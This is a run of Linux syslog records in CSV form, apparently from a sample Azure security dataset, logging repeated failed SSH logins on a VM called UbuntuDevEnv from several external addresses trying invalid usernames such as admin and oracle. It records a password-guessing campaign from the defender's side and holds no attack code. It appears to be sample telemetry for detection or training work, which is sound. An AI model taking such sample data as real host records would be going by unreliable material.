+9191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:41,UbuntuDevEnv,2019-06-25 22:28:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,45429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:44,UbuntuDevEnv,2019-06-25 22:28:43,auth,UbuntuDevEnv,info,Failed password for invalid user chandru from 178.62.54.79 port 60518 ssh2,45429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chandru,178.62.54.7,60518,,
+9193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:44,UbuntuDevEnv,2019-06-25 22:28:43,auth,UbuntuDevEnv,info,Disconnected from invalid user chandru 178.62.54.79 port 60518 [preauth],45429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chandru,178.62.54.7,60518,,
+9194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:44,UbuntuDevEnv,2019-06-25 22:28:43,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 60518:11: Bye Bye [preauth],45429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,60518,,
+9195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:21,UbuntuDevEnv,2019-06-25 22:29:21,auth,UbuntuDevEnv,info,Invalid user magalie from 77.232.128.87 port 50831,45573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magalie,77.232.128.8,50831,,
+9196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:21,UbuntuDevEnv,2019-06-25 22:29:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:21,UbuntuDevEnv,2019-06-25 22:29:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,45573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:22,UbuntuDevEnv,2019-06-25 22:29:22,auth,UbuntuDevEnv,info,Invalid user fwong from 139.199.113.140 port 52366,45575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fwong,139.199.113.1,52366,,
+9199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:22,UbuntuDevEnv,2019-06-25 22:29:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:22,UbuntuDevEnv,2019-06-25 22:29:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,45575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:23,UbuntuDevEnv,2019-06-25 22:29:23,auth,UbuntuDevEnv,info,Failed password for invalid user magalie from 77.232.128.87 port 50831 ssh2,45573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magalie,77.232.128.8,50831,,
+9202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:23,UbuntuDevEnv,2019-06-25 22:29:23,auth,UbuntuDevEnv,info,Disconnected from invalid user magalie 77.232.128.87 port 50831 [preauth],45573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magalie,77.232.128.8,50831,,
+9203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:23,UbuntuDevEnv,2019-06-25 22:29:23,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 50831:11: Bye Bye [preauth],45573,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,50831,,
+9204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:24,UbuntuDevEnv,2019-06-25 22:29:24,auth,UbuntuDevEnv,info,Failed password for invalid user fwong from 139.199.113.140 port 52366 ssh2,45575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fwong,139.199.113.1,52366,,
+9205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:24,UbuntuDevEnv,2019-06-25 22:29:24,auth,UbuntuDevEnv,info,Disconnected from invalid user fwong 139.199.113.140 port 52366 [preauth],45575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fwong,139.199.113.1,52366,,
+9206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:24,UbuntuDevEnv,2019-06-25 22:29:24,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 52366:11: Bye Bye [preauth],45575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,52366,,
+9207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:27,UbuntuDevEnv,2019-06-25 22:29:27,auth,UbuntuDevEnv,info,Invalid user ftb from 212.156.136.114 port 36183,45595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftb,212.156.136.1,36183,,
+9208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:27,UbuntuDevEnv,2019-06-25 22:29:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:27,UbuntuDevEnv,2019-06-25 22:29:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,45595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:29,UbuntuDevEnv,2019-06-25 22:29:29,auth,UbuntuDevEnv,info,Failed password for invalid user ftb from 212.156.136.114 port 36183 ssh2,45595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftb,212.156.136.1,36183,,
+9211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:30,UbuntuDevEnv,2019-06-25 22:29:29,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 36183:11: Bye Bye [preauth],45595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,36183,,
+9212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:30,UbuntuDevEnv,2019-06-25 22:29:29,auth,UbuntuDevEnv,info,Disconnected from invalid user ftb 212.156.136.114 port 36183 [preauth],45595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftb,212.156.136.1,36183,,
+9213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:55,UbuntuDevEnv,2019-06-25 22:29:55,auth,UbuntuDevEnv,info,Invalid user oracle from 152.250.252.179 port 58544,45689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,152.250.252.1,58544,,
+9214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:55,UbuntuDevEnv,2019-06-25 22:29:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:55,UbuntuDevEnv,2019-06-25 22:29:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,45689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:57,UbuntuDevEnv,2019-06-25 22:29:56,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 152.250.252.179 port 58544 ssh2,45689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,152.250.252.1,58544,,
+9217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:57,UbuntuDevEnv,2019-06-25 22:29:57,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 58544:11: Bye Bye [preauth],45689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,58544,,
+9218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:29:57,UbuntuDevEnv,2019-06-25 22:29:57,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 152.250.252.179 port 58544 [preauth],45689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,152.250.252.1,58544,,
+9219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:00,UbuntuDevEnv,2019-06-25 22:29:59,auth,UbuntuDevEnv,info,Invalid user tmp from 178.62.54.79 port 48662,45711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,178.62.54.7,48662,,
+9220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:00,UbuntuDevEnv,2019-06-25 22:29:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:00,UbuntuDevEnv,2019-06-25 22:29:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,45711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:02,UbuntuDevEnv,2019-06-25 22:30:02,auth,UbuntuDevEnv,info,Failed password for invalid user tmp from 178.62.54.79 port 48662 ssh2,45711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,178.62.54.7,48662,,
+9223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:02,UbuntuDevEnv,2019-06-25 22:30:02,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 48662:11: Bye Bye [preauth],45711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,48662,,
+9224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:02,UbuntuDevEnv,2019-06-25 22:30:02,auth,UbuntuDevEnv,info,Disconnected from invalid user tmp 178.62.54.79 port 48662 [preauth],45711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,178.62.54.7,48662,,
+9225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:40,UbuntuDevEnv,2019-06-25 22:30:39,auth,UbuntuDevEnv,info,Invalid user technic from 59.100.246.170 port 47566,45940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,technic,59.100.246.1,47566,,
+9226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:40,UbuntuDevEnv,2019-06-25 22:30:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:40,UbuntuDevEnv,2019-06-25 22:30:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=59.100.246.170,45940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,59.100.246.1,,0,
+9228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:41,UbuntuDevEnv,2019-06-25 22:30:41,auth,UbuntuDevEnv,info,Failed password for invalid user technic from 59.100.246.170 port 47566 ssh2,45940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,technic,59.100.246.1,47566,,
+9229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:42,UbuntuDevEnv,2019-06-25 22:30:41,auth,UbuntuDevEnv,info,Disconnected from invalid user technic 59.100.246.170 port 47566 [preauth],45940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,technic,59.100.246.1,47566,,
+9230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:42,UbuntuDevEnv,2019-06-25 22:30:41,auth,UbuntuDevEnv,info,Received disconnect from 59.100.246.170 port 47566:11: Bye Bye [preauth],45940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.100.246.1,47566,,
+9231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:48,UbuntuDevEnv,2019-06-25 22:30:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:48,UbuntuDevEnv,2019-06-25 22:30:48,auth,UbuntuDevEnv,info,Invalid user bolognesi from 139.199.113.140 port 38542,45971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bolognesi,139.199.113.1,38542,,
+9233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:48,UbuntuDevEnv,2019-06-25 22:30:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,45971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:51,UbuntuDevEnv,2019-06-25 22:30:50,auth,UbuntuDevEnv,info,Failed password for invalid user bolognesi from 139.199.113.140 port 38542 ssh2,45971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bolognesi,139.199.113.1,38542,,
+9235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:51,UbuntuDevEnv,2019-06-25 22:30:51,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 38542:11: Bye Bye [preauth],45971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,38542,,
+9236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:51,UbuntuDevEnv,2019-06-25 22:30:51,auth,UbuntuDevEnv,info,Disconnected from invalid user bolognesi 139.199.113.140 port 38542 [preauth],45971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bolognesi,139.199.113.1,38542,,
+9237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:56,UbuntuDevEnv,2019-06-25 22:30:55,auth,UbuntuDevEnv,info,Invalid user invitado from 212.156.136.114 port 50635,46002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,invitado,212.156.136.1,50635,,
+9238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:56,UbuntuDevEnv,2019-06-25 22:30:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,46002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:56,UbuntuDevEnv,2019-06-25 22:30:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:57,UbuntuDevEnv,2019-06-25 22:30:57,auth,UbuntuDevEnv,info,Failed password for invalid user invitado from 212.156.136.114 port 50635 ssh2,46002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,invitado,212.156.136.1,50635,,
+9241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:57,UbuntuDevEnv,2019-06-25 22:30:57,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 50635:11: Bye Bye [preauth],46002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,50635,,
+9242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:30:57,UbuntuDevEnv,2019-06-25 22:30:57,auth,UbuntuDevEnv,info,Disconnected from invalid user invitado 212.156.136.114 port 50635 [preauth],46002,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,invitado,212.156.136.1,50635,,
+9243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:20,UbuntuDevEnv,2019-06-25 22:31:19,auth,UbuntuDevEnv,info,Invalid user admin from 178.62.54.79 port 36806,46091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,178.62.54.7,36806,,
+9244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:20,UbuntuDevEnv,2019-06-25 22:31:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:20,UbuntuDevEnv,2019-06-25 22:31:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,46091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:22,UbuntuDevEnv,2019-06-25 22:31:21,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 178.62.54.79 port 36806 ssh2,46091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,178.62.54.7,36806,,
+9247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:22,UbuntuDevEnv,2019-06-25 22:31:21,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 178.62.54.79 port 36806 [preauth],46091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,178.62.54.7,36806,,
+9248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:22,UbuntuDevEnv,2019-06-25 22:31:21,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 36806:11: Bye Bye [preauth],46091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,36806,,
+9249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:41,UbuntuDevEnv,2019-06-25 22:31:40,auth,UbuntuDevEnv,info,Invalid user training from 152.250.252.179 port 46980,46165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,152.250.252.1,46980,,
+9250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:41,UbuntuDevEnv,2019-06-25 22:31:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,46165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
